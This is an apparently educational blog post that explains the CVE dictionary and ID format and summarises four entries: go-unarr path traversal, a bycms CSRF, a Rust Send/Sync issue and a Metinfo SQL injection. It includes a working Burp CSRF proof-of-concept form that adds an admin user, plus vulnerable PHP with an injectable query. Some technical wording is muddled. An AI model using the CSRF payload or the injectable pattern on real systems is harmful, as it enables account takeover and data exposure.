CVE, or Common Vulnerabilities and Exposures, is a public dictionary of registered vulnerabilities and threats in the system. According to the vision of those running the CVE documentation, the dictionary is intended to serve as an industry standard for communication between different teams. Although the creators themselves avoid the term, it is a database of sorts. According to their documentation, a vulnerability is defined as a weakness in a given system (resulting from bugs), while a threat is defined as a violation of security policy. A dictionary of CVEs can be found here.
What a CVE consists of
Each CVE has its own ID, which is constructed as follows:
CVE - Year of submission - Serial number = CVE-2021-38197
An example submission (depending on the information provided) may look like the image below.
As we can see, it includes the ID we mentioned, a brief description, a reference, the vulnerable version, the attack vector, its complexity and much more.
CVE examples
We will take a look at the last few vulnerabilities registered in the dictionary.
CVE-2021-38197
After playing CVE, we can learn that the notification is for a library go-unarr used to unpack RAR, TAR, ZIP and 7z archives. As a reference, a link to github is provided, from which we can learn that version 0.1.1 of the library allows the Path Travelsal attack, which in the example results in placing the archive file anywhere on the server.
CVE-2020-18457
We will use notification regarding the bycms content management system as another example. In version 1.3.0, a properly crafted (below) file with a form allows us to launch a CSRF attack. If you don't yet know what it consists of, we refer you to here.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin.php/ucenter/add.html" method="POST">
<input type="hidden" name="username" value="root" />
<input type="hidden" name="password" value="11a040841c73c8627c274ba30f8b2123" />
<input type="hidden" name="mobile" value="1233435346456" />
<input type="hidden" name="email" value="qweqwe@qq.com" />
<input type="hidden" name="cover_id" value="" />
<input type="hidden" name="file_path" value="" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CVE-2020-36458
Using this example, we can see the essence of the CVE vocabulary. Not all reports involve direct attacks on users using the application.
In the CVE we read that the parameters (T, E) for the ReaderResult class were asynchronous. As a result, it allowed for potential memory corruption if multiple threads used these parameters. To understand how this occurs, we need to have a basic understanding of the RUST language.
In documentation we read that parameters use traits (trait) to specify the functionality they implement. An example of a function accepting a generic type "T", implementing the trait displayed.
// Define a function `printer` that takes a generic type `T` which
// must implement trait `Display`.
fn printer<T: Display>(t: T) {
println!("{}", t);
}
In the aforementioned report, the feature of the T and E parameters was sending(Send), which, as we mentioned, was asynchronous.
CVE-2020-20981
The subject of the request is the Metinfo cms. In its version 7.0.0, it was possible to perform a SQL Blind Injection attack with the help of jdn endpoints. Vulnerable code:
public function dodel(){
global $_M;
$id = isset($_M['form']['id']) ? $_M['form']['id'] : '';
if (!$id){
$this->error($_M['word']['js10']);
}
$id = implode(',',$id);
$del_resutl = DB::query("DELETE FROM {$_M['table']['admin_logs']} WHERE id IN ({$id}) ");
if (!$del_resutl){
$this->error($_M['word']['opfailed']);
}
In the following line, the code is only filtered by addslashes, which ultimately changes nothing, as we are able to inject a malicious payload further down the line.
$id = isset($_M['form']['id']) ? $_M['form']['id'] : '';
Ultimately, the vulnerability results in access to sensitive data.
Sources
https://cve.mitre.org/
https://www.whitesourcesoftware.com/resources/blog/cve-vulnerability/
https://cve.circl.lu/cve/CVE-2021-38197
https://cve.circl.lu/cve/CVE-2020-18457
https://cve.circl.lu/cve/CVE-2020-36458
https://doc.rust-lang.org/rust-by-example/generics/bounds.html#bounds
https://cve.circl.lu/cve/CVE-2020-20981
Top comments (0)